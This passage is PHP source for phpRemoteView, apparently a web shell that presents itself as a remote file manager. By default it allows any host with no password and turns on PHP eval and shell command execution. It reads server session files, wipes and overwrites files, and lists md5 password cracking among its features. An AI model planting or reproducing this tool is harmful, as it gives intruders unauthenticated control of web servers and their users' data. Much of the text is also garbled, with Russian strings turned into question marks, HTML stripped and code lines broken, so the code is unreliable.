tags, thanks A.Voropay
*
* 2003.04.22 read first 64Kb of null-size file (example: /etc/zero),
* thanks Anight
* add many functions/converts: md5, decode md5 (pass crack),
* date/time, base64, translit, russian charsets
* fix bug: read session files
*
* 2002.08.24 new design and images
* many colums in panel
* sort & setup panel
* dir tree
* base64 encoding
* character map
* HTTP authentication with login/pass
* IP-address authentication with allow hosts
*
* --version3--
* 2002.08.10 add multi language support (english and russian)
* some update
*
* 2002.08.05 new: full windows support
* fix some bugs, thanks Jeremy Flinston
*
* 2002.07.31 add file upload for create files
* add 'direcrory commands'
* view full info after safe_mode errors
* fixed problem with register_glogals=off in php.ini
* fixed problem with magic quotes in php.ini (auto strip slashes)
*
* --version2--
* 2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
* add panel 'TOOLS': eval php-code and run shell commands
* add copy/edit/create file (+panel 'EDIT')
* add only-read mode (disable write/delete and PHP/Shell)
*
* 2002.01.19 add delete/touch/clean/wipe file
* add panel 'INFO', view a/c/m-time, hexdump view
* add session file view mode (link 'SESSION').
*
* 2002.01.12 first version!
*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
///////////////////////////////// S E T U P ///////////////////////////////////
$version="2003-10-23";
$hexdump_lines=8; // lines in hex preview file
$hexdump_rows=24; // 16, 24 or 32 bytes in one line
$mkdir_mode=0755; // chmode for new dir ('MkDir' button)
$maxsize_fread=65536; // read first 64Kb from any null-size file
// USER ACCESS //
$write_access=true; // true - user (you) may be write/delete files/dirs
// false - only read access
$phpeval_access=true; // true - user (you) may be execute any php-code
// false - function eval() disable
$system_access=true; // true - user (you) may be run shell commands
// false - function system() disable
// AUTHORIZATION //
$login=false; // Login & password for access to this programm.
$pass=false; // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
// Type 'login=false' for disable authorization.
$host_allow=array("*"); // Type list of your(allow) hosts. All other - denied.
// Example: $host_allow=array("127.0.0.*","localhost")
///////////////////////////////////////////////////////////////////////////////
$tmp=array();
foreach ($host_allow as $k=>$v)
$tmp[]=str_replace("\\*",".*",preg_quote($v));
$s="!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR"))))
exit("phpRemoteView: Access Denied - your host not allow
\n");
if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) ||
$HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
header("HTTP/1.0 401 Unauthorized");
exit("phpRemoteView: Access Denied - password erroneous
\n");
}
error_reporting(2047);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
$self=basename($HTTP_SERVER_VARS['PHP_SELF']);
$url="http://".getenv('HTTP_HOST').
(getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
$HTTP_SERVER_VARS['PHP_SELF'].
(getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
$uurl=urlencode($url);
//
// antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
//
$autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
"ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
"fatt showfile showsize root name ref names sort sortby ".
"datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
foreach (explode(" ",$autovars1) as $k=>$v) {
if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
//elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
}
//
// autofix 'magic quotes':
//
$autovars2="php shell text d root convert";
if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
foreach (explode(" ",$autovars2) as $k=>$v) {
if (isset($$v)) $$v=stripslashes($$v);
}
}
$cp_def=array(
"001001",
"nst2ac",
"d/m/y H:i",
"Tahoma",
"9"
);
$panel=0;
if (isset($HTTP_COOKIE_VARS["cp$panel"]))
$cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]);
else
$cp=$cp_def;
$cc=$cp[0];
$cn=$cp[1];
/*
$cc / $cp[0]- ?????? ????????????? ??????????, ??????????? ? $cs:
$cc[0] - ?? ????? ??????? ???????????, ? ???? ??? ?? ?????:
n - ?? ?????
e - ??????????
$cc[1] - ??????? (0 - ???????. 1 - ?????????)
$cc[2] - ?????????? ?? ??????
$cc[3] - ??? ?????? ??? ????? ?? ?????? ?????:
0 - ???????? ? text/plain
1 - ???????? ? html
2 - download
3 - ????????? ????? (info)
$cc[4] - ????????? ?????? ?????? ?? ??/??/??
$cc[5] - ????:
1 - ??????????
2 - ??????
$cn / $cp[1] - ?????? ??????? ? ?? ???????, ??????? ??????????, ?????? ????/????:
t - type
n - name
s - size
a - owner+group
o - owner
g - group
c - chmod
1 - create time
2 - modify time
3 - access time
$cp[2]: ?????? ???????
$cp[3]: ??? ??????
$cp[4]: ?????? ??????
*/
// ??? ??????????? ???????
$cn_align=array();
$cn_align['t']='center';
$cn_align['n']='left';
$cn_align['s']='right';
$cn_align['a']='center';
$cn_align['o']='center';
$cn_align['g']='center';
$cn_align['c']='center';
$cn_align['1']='center';
$cn_align['2']='center';
$cn_align['3']='center';
///////////////////////////////////////////////////////////////////////////////
/*--mmstart--*/
$mm=array(
"Index of"=>"??????",
"View file"=>"????? ?????",
"DISK"=>"????",
"Info"=>"????",
"Plain"=>"??????",
"HTML"=>"HTML",
"Session"=>"??????",
"Image"=>"????????",
"Notepad"=>"???????",
"DOWNLOAD"=>"?????????",
"Edit"=>"??????",
"Sorry, this programm run in read-only mode."=>"????????, ??? ????????? ???????? ? ?????? '?????? ??????'.",
"For full access: write"=>"??? ??????? ???????: ????????",
"in this php-file"=>"? ???? php-?????",
"Reason"=>"???????",
"Error path"=>"????????? ????",
"Click here for start"=>"??????? ??? ??????",
"up directory"=>"??????? ????",
"access denied"=>"?????? ????????",
"REMVIEW TOOLS"=>"??????? REMVIEW",
"version"=>"??????",
"Free download"=>"?????????? ????????",
"back to directory"=>"????????? ? ???????",
"Size"=>"??????",
"Owner"=>"?????",
"Group"=>"??????",
"FileType"=>"??? ?????",
"Perms"=>"?????",
"Create time"=>"????? ????????",
"Access time"=>"????? ???????",
"MODIFY time"=>"????? ?????????",
"HEXDUMP PREVIEW"=>"???????????? ? 16-?????? ????",
"ONLY READ ACCESS"=>"?????? ?????? ?? ??????",
"Can't READ file - access denied"=>"?? ???? ????????? - ?????? ????????",
"full read/write access"=>"?????? ?????? ?? ??????/??????",
"FILE SYSTEM COMMANDS"=>"??????? ???????? ???????",
"EDIT"=>"??????.",
"FILE"=>"????",
"DELETE"=>"???????",
"Delete this file"=>"??????? ????",
"CLEAN"=>"????????",
"TOUCH"=>"????????",
"Set current 'mtime'"=>"?????.?????.?????",
"WIPE(delete)"=>"??????????",
"Write '0000..' and delete"=>"?????? ??????, ???????",
"COPY FILE"=>"?????????? ????",
"COPY"=>"??????????",
"MAKE DIR"=>"??????? ???????",
"type full path"=>"??????? ?????? ????",
"MkDir"=>"????.???.",
"CREATE NEW FILE or override old file"=>"??????? ????? ???? ??? ???????????? ??????",
"CREATE/OVERRIDE"=>"???????/????????????",
"select file on your local computer"=>"??????? ???? ?? ????? ????????? ??????????",
"save this file on path"=>"????????? ???? ???? ? ???????",
"create file name automatic"=>"????????? ??? ????? ?????????????",
"OR"=>"???",
"type any file name"=>"?????? ??? ????? ???????",
"convert file name to lovercase"=>"?????????????? ??? ? ?????? ???????",
"Send File"=>"??????? ????",
"Delete all files in dir"=>"??????? ??? ?????",
"Delete all dir/files recursive"=>"??????? ??? +??????????? ??????????",
"Confirm not found (go back and set checkbox)"=>"????????????? ?? ?????????? (????????? ????? ? ????????? ???????)",
"Delete cancel - File not found"=>"???????? ???????? - ???? ?? ??????",
"YES"=>"??",
"ME"=>"????",
"NO (back)"=>"??? (?????)",
"Delete cancel"=>"???????? ????????",
"ACCESS DENIED"=>"?????? ????????",
"done (go back)"=>"?????? (?????)",
"Delete ok"=>"??, ????????",
"Touch cancel"=>"?????????? ????????",
"Touch ok (set current time to 'modify time')"=>"?????????? ????????? (????? ????????? ??????? ????? ???????????)",
"Clean (empty file) cancel"=>"???????? (????????? ?????) ????????",
"Clean ok (file now empty)"=>"??, ??????? (???? ???????)",
"Wipe cancel - access denied"=>"??????????? ???????? - ?????? ????????",
"Wipe ok (file deleted)"=>"??, ?????????? (? ???? ?????)",
"DIR"=>"DIR",
"Deleting all files in"=>"???????? ???? ?????? ?",
"skip"=>"???????",
"deleting"=>"????????",
"Deleting all dir/files (recursive) in"=>"???????? ???? ??????/???????????? (??????????)",
"DONE, go back"=>"??????, ?????",
"DONE"=>"??????",
"file not found"=>"???? ?? ??????",
"ONLY READ ACCESS (don't edit!)"=>"?????? ?????? ?? ?????? (?? ?????????????)",
"Can't READ file - access denied (don't edit!)"=>"?? ???? ?????? ???? - ?????? ????????",
"EDIT FILE"=>"??????? ????",
"can't open, access denied"=>"?? ???? ???????, ?????? ????????",
"SAVE FILE (write to disk)"=>"????????? ???? (?????? ?? ????)",
"You mast checked 'create file name automatic' OR typed file name!"=>"?? ?????? ???????? ??????? [??????? ???? ?????????????] ??? ?????? ? ???? ??? ?????!'",
"SAVING TO"=>"????????? ?",
"Sorry, access denied"=>"????????, ?????? ????????",
"for example, uncomment next line"=>"??? ???????, ???????????????? ????????? ??????",
"Eval PHP code"=>"????????? PHP ???",
"don't type"=>"?? ??????",
"and"=>"?",
"example (remove comments '#')"=>"?????? (??????? ??????????? '#')",
"Shell commands"=>"??????? Shell'a",
"filesize to 0byte"=>"?????? ? 0 ????",
"from"=>"??",
"to"=>"?",
"Full file name"=>"?????? ??? ?????",
"Can't open directory"=>"?? ???? ??????? ???????",
"setup"=>"?????????",
"back"=>"?????",
"Reset all settings"=>"???????? ??? ?????????",
"clear"=>"????????",
"Current"=>"???????",
"Colums and sort"=>"??????? ? ??????????",
"Sort order"=>"??????? ??????????",
"Ascending sort"=>"?? ???????????",
"Descending sort"=>"?? ????????",
"Sort by filename"=>"??????????? ?? ????? ?????",
"Sort by filename extension"=>"??????????? ?? ?????????? ?????",
"Date/time format"=>"?????? ????/???????",
"Panel font & size"=>"?????/?????? ??????",
"Setup"=>"?????",
"Char map"=>"???????",
"Language"=>"????",
"English"=>"??????????",
"Russian"=>"???????",
"Character map (symbol codes table)"=>"??????? ????????",
"Select font"=>"???????? ?????",
"or type other"=>"??? ??????? ??????",
"Font size"=>"?????? ??????",
"Code limit"=>"??????? ?????",
"Generate table"=>"????????????? ???????",
"Universal convert"=>"????????????? ???????????"
);/*--mmstop--*/
$language=$cc[5];
if ($language!=1 && $language!=2) $language=1;
function mm($m) {
global $mm,$language;
if ($language==1) return $m;
if (isset($mm[$m])) return $mm[$m];
else echo "";
}
switch ($language) {
case 1:
$cn_name=array(
't'=>"Type",
'n'=>"Name",
's'=>"Size",
'o'=>"Owner",
'g'=>"Group",
'a'=>"Owner/Group",
'c'=>"Perms",
'1'=>"Create",
'2'=>"Modify",
'3'=>"Access"
);
break;
case 2:
$cn_name=array(
't'=>"???",
'n'=>"???",
's'=>"??????",
'o'=>"????????",
'g'=>"??????",
'a'=>"????????/??????",
'c'=>"?????",
'1'=>"??????",
'2'=>"???????",
'3'=>"??????"
);
break;
}
///////////////////////////////////////////////////////////////////////////////
$rand=microtime();
if (!isset($c)) $c="";
if (!isset($d)) $d="";
if (!isset($f)) $f="";
ob();
$d=str_replace("\\","/",$d);
if ($d=="") $d=realpath("./")."/";
if ($c=="") $c="l";
if ($d[strlen($d)-1]!="/") $d.="/";
$d=str_replace("\\","/",$d);
if (!is_dir($d)) obb().die("".mm("Can't open directory")." $d$obb");
if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
obb();
//
// OS detect:
//
$win=0;
$unix=0;
if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
///////////////////////////////////////////////////////////////////////////////
$html=<<
phpRemoteView: $d$f
remview;
function display_perms($mode)
{
if ($GLOBALS['win']) return 0;
/* Determine Type */
if( $mode & 0x1000 )
$type='p'; /* FIFO pipe */
else if( $mode & 0x2000 )
$type='c'; /* Character special */
else if( $mode & 0x4000 )
$type='d'; /* Directory */
else if( $mode & 0x6000 )
$type='b'; /* Block special */
else if( $mode & 0x8000 )
$type='-'; /* Regular */
else if( $mode & 0xA000 )
$type='l'; /* Symbolic Link */
else if( $mode & 0xC000 )
$type='s'; /* Socket */
else
$type='u'; /* UNKNOWN */
/* Determine permissions */
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
/* Adjust for SUID, SGID and sticky bit */
if( $mode & 0x800 )
$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 )
$group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 )
$world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function _posix_getpwuid($x) {
if ($GLOBALS['win']) return array();
return @posix_getpwuid($x);
}
function _posix_getgrgid($x) {
if ($GLOBALS['win']) return array();
return @posix_getgrgid($x);
}
function up($d,$f="",$name="") {
global $self,$win;
$len=strlen($d."/".$f);
if ($len<70) { $sf1=""; $sf2=""; }
elseif ($len<90) {$sf1=""; $sf2="";}
else {$sf1=""; $sf2="";}
echo "| $sf1";
$home="*";
echo $home.$sf2."";
if ($name!="") echo $name;
else {
if ($f=="") echo mm("Index of");
else echo mm("View file");
}
echo " ";
$path=explode("/",$d);
$rootdir="/";
if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
$ss="";
for ($i=0; $i$comm";
if ($i==0 && $d=="/") break;
}
echo "";
if ($f!="") echo "$sf1$f";
if ($win && strlen($d)<4 && $f=="") {
echo " ".mm("DISK").": ";
for ($i=ord('a'); $i<=ord('z'); $i++) {
echo "".strtoupper(chr($i)).": ";
}
}
echo " |
|
";
}
function up_link($d,$f) {
global $self;
$notepad=str_replace(".","_",$f).".txt";
echo "
[".mm("Info")."]
[".mm("Plain")."(+)]
[".mm("HTML")."(+)]
[".mm("Session")."]
[".mm("Image")."]
[".mm("Notepad")."]
[".mm("DOWNLOAD")."]
[".mm("Edit")."]
";
}
function exitw() {
exit("
".mm("Sorry, this programm run in read-only mode.")."
".mm("For full access: write")." `\$write_access=true;`
".mm("in this php-file").". |
");
}
function ob() {
global $obb_flag, $obb;
if (!isset($obb_flag)) { $obb_flag=0; $obb=false; }
if (function_exists("ob_start")) {
if ($GLOBALS['obb_flag']) ob_end_clean();
ob_start();
$GLOBALS['obb_flag']=1;
}
}
function obb() {
global $obb;
if (function_exists("ob_start")) {
$obb=ob_get_contents();
ob_end_clean();
$obb="
";
$GLOBALS['obb_flag']=0;
}
}
function sizeparse($size) {
return strrev(preg_replace("!...!","\\0 ",strrev($size)));
}
function jsval($msg) {
$msg=str_replace("\\","\\\\",$msg);
$msg=str_replace("\"","\\\"",$msg);
$msg=str_replace("'","\\'",$msg);
return '"'.$msg.'",';
}
///////////////////////////////////////////////////////////////////////////
switch($c) {
// listing
case "l":
echo $GLOBALS['html'];
if (!realpath($d)) die("".mm("Error path").". ".mm("Click here for start").".");
//up($d);
ob();
$di=dir($d);
obb();
$dirs=array();
$files=array();
if (!$di) exit("<<< ".mm("up directory")." >>>
".
"".mm("access denied").": $obb");
while (false!==($name=$di->read())) {
if ($name=="." || $name=="..") continue;
if (@is_dir($d.$name)) {
$dirs[]=strval($name);
$fstatus[$name]=0;
}
else {
$files[]=strval($name);
$fstatus[$name]=1;
}
$fsize[$name]=@filesize($d.$name);
$ftype[$name]=@filetype($d.$name);
if (!is_int($fsize[$name])) { $ftype[$name]='?'; $fstatus[$name]=1; }
$fperms[$name]=@fileperms($d.$name);
$fmtime[$name]=@filemtime($d.$name);
$fatime[$name]=@fileatime($d.$name);
$fctime[$name]=@filectime($d.$name);
$fowner[$name]=@fileowner($d.$name);
$fgroup[$name]=@filegroup($d.$name);
if (preg_match("!^[^.].*\.([^.]+)$!",$name,$ok))
$fext[$name]=strtolower($ok[1]);
else
$fext[$name]="";
}
$di->close();
$listsort=array();
if (count($dirs))
foreach ($dirs as $v) {
switch ($cc[0]) {
case "e": $listsort[$v]=$fext[$v].' '.$v; break;
case "n": $listsort[$v]=strtolower($v); break;
default:
switch ($cn[$cc[0]]) {
case "t": case "s": case "n": $listsort[$v]=strtolower($v); break;
case "o": $listsort[$v]=$fowner[$v]; break;
case "g": $listsort[$v]=$fgroup[$v]; break;
case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
case "c": $listsort[$v]=$fperms[$v]; break;
case "1": $listsort[$v]=$fctime[$v]; break;
case "2": $listsort[$v]=$fmtime[$v]; break;
case "3": $listsort[$v]=$fatime[$v]; break;
}
}
}
$names=$listsort;
//echo "
";print_r($names);
if ($cc[1]) arsort($names); else asort($names);
//echo "";print_r($names);
$listsort=array();
if (count($files))
foreach ($files as $v) {
$v=strval($v);
switch ($cc[0]) {
case "e": $listsort[$v]=$fext[$v].' '.$v; break;
case "n": $listsort[$v]=strtolower($v); break;
default:
switch ($cn[$cc[0]]) {
case "n": $listsort[$v]=strtolower($v); break;
case "t": $listsort[$v]=$ftype[$v]; break;
case "s": $listsort[$v]=$fsize[$v]; break;
case "o": $listsort[$v]=$fowner[$v]; break;
case "g": $listsort[$v]=$fgroup[$v]; break;
case "a": $listsort[$v]="$fowner[$v] $fgroup[$v]"; break;
case "c": $listsort[$v]=$fperms[$v]; break;
case "1": $listsort[$v]=$fctime[$v]; break;
case "2": $listsort[$v]=$fmtime[$v]; break;
case "3": $listsort[$v]=$fatime[$v]; break;
}
}
}
//echo "DIRS:"; print_r($names);
if ($cc[1]) arsort($listsort); else asort($listsort);
//$names=array_merge($names,$listsort);
foreach ($listsort as $k=>$v) $names[$k]=$v;
//echo "FILES:"; print_r($listsort);
//echo "NAMES:"; print_r($names);
?>
";
if (strlen($d)>$gr && $i>0 && $i+1$gr) {
$out.="••";
$sum+=strlen($n[$i]);
}
else
$out.=$n[$i];
}
else
if ($i==0) $out.=strtoupper($n[$i]); else $out.=$n[$i];
$out.="/";
}
return $out;
return "$d";
}
$ext=array();
$ext['html']=array('html','htm','shtml');
$ext['txt']=array('txt','ini','conf','','bat','sh','tcl','js','bak','doc','log','sfc','c','cpp','h','cfg');
$ext['exe']=array('exe','com','pif','src','lnk');
$ext['php']=array('php','phtml','php3','php4','inc');
$ext['img']=array('gif','png','jpeg','jpg','jpe','bmp','ico','tif','tiff','avi','mpg','mpeg');
echo "\n\n\n\n\n\n";
//phpinfo();
//echo implode(" | ",$cp);
echo '';
echo "
".mm("Setup")." |
PHP eval |
phpinfo() |
Shell |
".mm("Char map")." |
".mm("Language").":
".mm("English")."/".mm("Russian")."
";
break;
case "set":
switch ($c2) {
case "sort":
$name=intval($name);
if ($name==$cc[0]) if ($cc[1]==='0') $cc[1]='1'; else $cc[1]='0';
$cc[0]=$name;
break;
case "panel":
$cn='';
foreach ($names as $k=>$v) {
if ($v!="") $cn.=substr($v,0,1);
}
$cc[0]=substr($sort,0,1);
$cc[1]=substr($sortby,0,1);
$cp[2]=substr($datetime,0,50);
$cp[3]=substr($fontname,0,50);
$cp[4]=substr($fontsize,0,50);
//exit("cn=$cn
cc=$cc");
break;
case "eng":
$cc[5]=1;
break;
case "rus":
$cc[5]=2;
break;
}
$cookie=$cc."~".$cn."~".$cp[2]."~".$cp[3]."~".$cp[4];
if ($c2=="reset") $cookie=implode("~",$cp_def);
//echo "";
setcookie("cp$pan",$cookie,time()+24*60*60*333,'/');
header("Location: $ref");
echo "";
//echo "[$ref]";
//phpinfo();
break;
case "setup":
echo $GLOBALS['html'];
echo "phpRemoteView ".mm("setup")." [".mm("back")."]
";
echo "";
echo "
".mm("Reset all settings").": ".mm("clear")."";
echo " (".mm("Current").": ".implode(" | ",$cp).")";
echo "
";
echo "
";
break;
// view
case "v":
if (!isset($fnot)) $fnot=0;
if (!isset($ftype)) $ftype=0;
if ($fnot==0) {
echo $GLOBALS['html'];
up($d,$f);
echo "<<<".mm("back to directory")." >>>";
up_link($d,$f);
echo "
";
}
if (!realpath($d.$f) || !file_exists($d.$f)) exit("".mm("file not found")."");
if (!is_file($d.$f) || !$fi=@fopen($d.$f,"rb")) exit("".mm("access denied")."");
if ($ftype==0 || $ftype==4) {
$buf=fread($fi,max(filesize($d.$f),$maxsize_fread));
fclose($fi);
}
switch ($ftype) {
case 0:
echo "
".htmlspecialchars($buf)."
";
break;
case 1:
readfile($d.$f);
break;
case 2:
header("Content-type: image/gif");
readfile($d.$f);
break;
case 3: // download
if (isset($fatt) && strlen($fatt)>0) {
$attach=$fatt;
header("Content-type: text/plain");
}
else {
$attach=$f;
header("Content-type: phpspbru");
}
header("Content-disposition: attachment; filename=\"$attach\";");
readfile($d.$f);
break;
case 4: // session
echo "<![CDATA[";
if (substr($f,0,5)=="sess_" && preg_match("!^sess_([a-z0-9]{32})$!i",$f,$ok)) {
ini_set("session.save_path",$d);
session_id($ok[1]);
session_start();
print_r($HTTP_SESSION_VARS);
}
else {
print_r(unserialize($buf));
}
echo "]]>";//
<![CDATA[";
break;
}
break;
case "i": // information for FILE
echo $GLOBALS['html'];
up($d,$f);
echo "<a href=$self?&c=l&d=".urlencode($d)."><nobr><<<<b>".mm("back to directory")."</b> >>></nobr></a>";
up_link($d,$f);
if (!realpath($d.$f) || !file_exists($d.$f)) exit(mm("file not found"));
echo "<P><big><b><tt>".htmlspecialchars($d.$f)."</tt></b></big><P>";
echo "<table class=tab border=0 cellspacing=1 cellpadding=2>";
echo "<tr class=tr><td>".mm("Size")." </td><td> ".filesize($d.$f)."</td></tR>";
echo "<tr class=tr><td>".mm("Owner")."/".mm("Group")." </td><td> ";
$tmp=@_posix_getpwuid(fileowner($d.$f));
if (!isset($tmp['name']) || $tmp['name']=="") echo fileowner($d.$f)." ";
else echo $tmp['name']." ";
$tmp=@_posix_getgrgid(filegroup($d.$f));
if (!isset($tmp['name']) || $tmp['name']=="") echo filegroup($d.$f);
else echo $tmp['name'];
echo "<tr class=tr><td>".mm("FileType")." </td><td> ".filetype($d.$f)."</td></tr>";
echo "<tr class=tr><td>".mm("Perms")." </td><td> ".display_perms(fileperms($d.$f))."</td></tr>";
echo "<tr class=tr><td>".mm("Create time")." </td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr>";
echo "<tr class=tr><td>".mm("Access time")." </td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr>";
echo "<tr class=tr><td>".mm("MODIFY time")." </td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr>";
echo "</table><P>";
$fi=@fopen($d.$f,"rb");
if ($fi) {
$str=fread($fi,$hexdump_lines*$hexdump_rows);
echo "<b>".mm("HEXDUMP PREVIEW")."</b>";
$n=0;
$a0="00000000<br>";
$a1="";
$a2="";
for ($i=0; $i<strlen($str); $i++) {
$a1.=sprintf("%02X",ord($str[$i])).' ';
switch (ord($str[$i])) {
case 0: $a2.="<font class=s2>0</font>"; break;
case 32:
case 10:
case 13: $a2.=" "; break;
default: $a2.=htmlspecialchars($str[$i]);
}
$n++;
if ($n==$hexdump_rows) {
$n=0;
if ($i+1<strlen($str)) $a0.=sprintf("%08X",$i+1)."<br>";
$a1.="<br>";
$a2.="<br>";
}
}
//if ($a1!="") $a0.=sprintf("%08X",$i)."<br>";
echo "<table border=0 bgcolor=#cccccc cellspacing=1 cellpadding=4 ".
"class=sy><tr><td bgcolor=#e0e0e0>$a0</td><td bgcolor=white>".
"$a1</td><td bgcolor=white>$a2</td></tr></table><p>";
}
echo "<b>Base64: </b>
<nobr>[<a href=$self?c=base64&c2=0&d=".urlencode($d)."&f=".urlencode($f).">Encode</a>] </nobr>
<nobr>[<a href=$self?c=base64&c2=1&d=".urlencode($d)."&f=".urlencode($f).">+chunk</a>] </nobr>
<nobr>[<a href=$self?c=base64&c2=2&d=".urlencode($d)."&f=".urlencode($f).">+chunk+quotes</a>] </nobr>
<nobr>[<a href=$self?c=base64&c2=3&d=".urlencode($d)."&f=".urlencode($f).">Decode</a>] </nobr>
<P>";
if (!$write_access) exitw();
$msg="";
if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r+")) $msg=" (<font color=red><b>".mm("ONLY READ ACCESS")."</b></font>)";
else fclose($fi);
if (!is_file($d.$f) || !$fi=@fopen($d.$f,"r")) $msg=" (<font color=red><b>".mm("Can't READ file - access denied")."</b></font>)";
else fclose($fi);
if ($msg=="") $msg=" (".mm("full read/write access").")";
echo "<b>".mm("FILE SYSTEM COMMANDS")."$msg</b><p>";
echo "
<table border=0 cellspacing=0 cellpadding=0><tr>
<td bgcolor=#cccccc><a href=$self?c=e&d=".urlencode($d)."&f=".urlencode($f).
"><b> ".mm("EDIT")." <br> ".mm("FILE")." </b></a></td>
<td> </td>
<td><form action=$self method=post>
<input type=hidden name=c value=delete>
<input type=hidden name=c2 value=delete>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
<input type=submit value='".mm("DELETE")."'><small>></small><input type=checkbox name=confirm value=delete></nobr><br>
<small>".mm("Delete this file")."</small>
</td><td></form></td><td> </td>
<td><form action=$self method=post>
<input type=hidden name=c value=delete>
<input type=hidden name=c2 value=clean>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
<input type=submit value='".mm("CLEAN")."'><small>></small><input type=checkbox name=confirm value=touch></nobr><br>
<small>".mm("filesize to 0byte")."</small>
</td><td></form></td><td> </td>
<td><form action=$self method=post>
<input type=hidden name=c value=delete>
<input type=hidden name=c2 value=touch>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
<input type=submit value='".mm("TOUCH")."'><small>></small><input type=checkbox name=confirm value=touch></nobr><br>
<small>".mm("Set current 'mtime'")."</small>
</td><td></form></td><td> </td>
<td><form action=$self method=post>
<input type=hidden name=c value=delete>
<input type=hidden name=c2 value=wipe>
<input type=hidden name=d value=\"".htmlspecialchars($d)."\">
<input type=hidden name=f value=\"".htmlspecialchars($f)."\">
<input type=submit value='".mm("WIPE(delete)")."'><small>></small><input type=checkbox name=confirm value=delete></nobr><br>
<small>".mm("Write '0000..' and delete")."</small>
</td><td></form></td><td> </td>
</tr></table>
";
echo "<form action=$self method=post><input type=hidden name=c value=copy>".
"<b>".mm("COPY FILE")."</b> ".mm("from")." <input type=text size=40 name=from value=\"".htmlspecialchars($d.$f)."\">".
" ".mm("to")." <input type=text name=to size=40 value=\"".htmlspecialchars($d.$f)."\">".
"<nobr><input type=submit value='".mm("COPY")."!'>".
"><input type=checkbox name=confirm value=copy></nobr></form>";
echo "
<form action=$self method=post>
<b>".mm("MAKE DIR")."</b> (".mm("type full path").")
<input type=hidden name=c value=newdir_submit>
<input type=text size=60 name=df value=\"".htmlspecialchars($d)."\">
<input type=submit value='".mm("MkDir")."'>
</form>";
echo "
<form action=$self method=post>
<b>".mm("CREATE NEW FILE or override old file")."</b><br>
<input type=hidden name=c value=newfile_submit>
".mm("Full file name")." <input type=text size=50 name=df value=\"".htmlspecialchars($d.$f)."\">
<input type=submit value='".mm("CREATE/OVERRIDE")."'>
<input type=checkbox name=confirm value=1 id=conf1><label for=conf1><=confirm</label><br>
<textarea name=text cols=70 rows=10 style='width: 100%;'></textarea><br>
</form>";
echo "
<form enctype='multipart/form-data' action='$self' method=post>
<input type=hidden name=c value=fileupload_submit>
<b>FILE UPLOAD: ".mm("CREATE NEW FILE or override old file")."</b><br>
<input type=hidden name='MAX_FILE_SIZE' value=999000000>
1. ".mm("select file on your local computer").": <input name=userfile type=file><br>
2. ".mm("save this file on path").":
<input name=df size=50 value=\"$d$f\"><br>
3. <input type=checkbox name=df2 value=1 id=df2 checked>
<label for=df2>".mm("create file name automatic")."</label>
".mm("OR")."
".mm("type any file name").":
<input name=df3 size=20><br>
4. <input type=checkbox name=df4 value=1 id=df4>
<label for=df4>".mm("convert file name to lovercase")."</label><br>
<input type=submit value='".mm("Send File")."'>
</form>";
break;
case "base64":
echo "<pre>\n";
$ff=fopen($d.$f,"rb") or exit("<p>access denied");
$text=fread($ff,max(filesize($d.$f),$maxsize_fread));
fclose($ff);
switch ($c2) {
case 0:
echo base64_encode($text);
break;
case 1:
echo chunk_split(base64_encode($text));
break;
case 2:
$text=base64_encode($text);
echo substr(preg_replace("!.{1,76}!","'\\0'.\n",$text),0,-2);
break;
case 3:
echo base64_decode($text);
break;
}
break;
case "d": // information for DIRECTORY
echo $GLOBALS['html'];
up($d,"","Directory");
